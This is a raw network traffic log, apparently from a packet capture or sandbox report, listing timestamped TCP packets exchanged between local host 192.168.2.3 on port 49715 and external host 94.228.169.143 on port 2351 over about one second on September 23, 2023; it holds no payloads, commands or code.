Sep 23, 2023 08:02:10.802360058 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.802372932 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.802423954 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.802472115 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.802510023 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.802565098 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.802577972 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.802648067 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.802684069 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.802700043 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.802721977 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.802788973 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.802793980 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.802825928 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.802884102 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.802895069 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.802931070 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.802980900 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.802999020 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.803065062 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.803101063 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.803118944 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.803169966 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.803206921 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.803225040 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.803246975 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.803282976 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.803298950 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.803350925 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.803388119 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.803402901 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.803457975 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.803510904 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.803555965 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.803591967 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.803646088 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.803658962 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.803697109 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.803735971 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.803750038 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.803771019 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.803821087 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.803838968 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.803909063 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.803945065 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.803960085 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.803983927 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.804033041 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.804053068 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.804120064 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.804157019 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.804171085 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.804193974 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.804244041 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.804316044 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.804384947 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.804420948 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.804435968 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.804546118 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.804599047 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.804615021 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.804814100 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.804851055 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.804867983 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.804933071 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.804970026 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.804997921 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.805007935 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.805058956 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.805079937 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.805118084 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.805152893 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.805166006 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.805222034 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.805259943 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.805274963 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.805331945 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.805382967 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.805402040 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.805619955 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.805658102 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.805672884 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.805867910 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.805905104 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.805917978 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.805964947 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.806015968 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.806225061 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.806381941 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.806432962 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.806595087 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.806736946 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.806776047 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.806790113 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.806854010 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.806891918 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.806905031 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.806930065 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.806978941 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.806998968 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.807035923 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.807071924 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.807084084 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.807172060 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.807225943 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.807239056 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.807310104 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.807358027 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.809185982 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.844402075 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.844429970 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.844544888 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.844795942 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.844841957 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.844898939 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.845087051 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.845145941 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.845197916 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.845354080 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.845443010 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.845499039 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.845504999 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.845603943 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.845666885 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.123298883 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.123369932 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.123408079 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.123444080 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.123487949 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.123522997 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.123531103 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.123531103 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.123562098 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.123603106 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.123637915 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.123675108 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.123711109 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.123713017 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.123713017 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.123743057 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.123749971 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.123786926 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.123810053 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.123831034 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.123898983 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.123955011 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.123992920 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.124047041 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.124063969 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.124099970 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.124161959 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.124202013 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.124272108 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.124308109 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.124330997 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.124438047 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.124475956 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.124526978 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.124576092 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.124613047 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.124640942 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.124650955 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.124691010 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.124706030 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.124727964 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.124787092 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.124833107 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.124874115 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.124927998 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.124974012 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.125044107 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.125097990 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.125184059 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.125220060 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.125273943 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.125324965 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.125361919 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.125400066 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.125417948 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.125437021 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.125490904 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.125504971 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.125545025 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.125611067 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.125643015 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.125749111 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.125808001 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.125837088 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.125905037 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.125961065 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.125974894 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.126012087 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.126064062 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.126080036 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.126148939 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.126203060 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.126272917 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.126390934 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.126449108 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.126451015 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.126521111 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.126558065 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.126580000 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.126672029 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.126735926 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.126769066 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.126837969 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.126899004 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.126899004 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.126936913 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.126991987 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.127006054 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.127043009 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.127079010 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.127095938 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.127120972 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.127177954 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.127219915 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.127330065 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.127386093 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.127391100 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.127454996 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.127511024 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.127540112 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.127610922 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.127646923 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.127671003 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.127727032 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.127763987 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.127784014 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.127865076 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.127904892 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.127933025 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.127988100 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.128048897 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.128088951 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.128130913 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.128166914 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.128182888 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.128262997 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.128299952 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.128329039 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.128336906 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.128374100 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.128393888 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.128473043 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.128566980 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.128571987 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.128609896 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.128664017 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.128720999 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.128808022 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.128875971 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.128916025 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.129002094 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.129054070 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.129082918 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.129182100 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.129239082 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.129246950 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.129350901 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.129406929 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.129425049 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.129506111 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.129544973 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.129556894 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.129637003 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.129695892 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.129709005 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.129796028 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.129847050 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.129861116 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.129935980 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.129983902 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.130012035 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.130064964 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.130114079 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.130142927 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.130199909 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.130251884 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.130285978 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.130299091 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.130341053 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.130352974 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.130426884 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.130491972 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.130561113 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.130606890 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.130667925 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.130670071 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.130667925 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.130708933 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.130709887 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.130781889 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.130827904 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.130861998 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.130932093 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.130984068 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.131016016 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.131093025 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.131139040 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.131139994 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.131184101 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.131237030 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.131242037 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.131259918 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.131303072 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.131334066 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.131412983 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.131460905 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.131493092 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.131573915 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.131627083 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.131628036 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.131659985 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.131711006 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.131731987 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.131772995 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.131827116 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.131860018 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.131926060 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.131974936 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.131990910 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.132014990 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:11.132061958 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:11.132107019 CEST	2351	49715	94.228.169.143	192.168.2.3
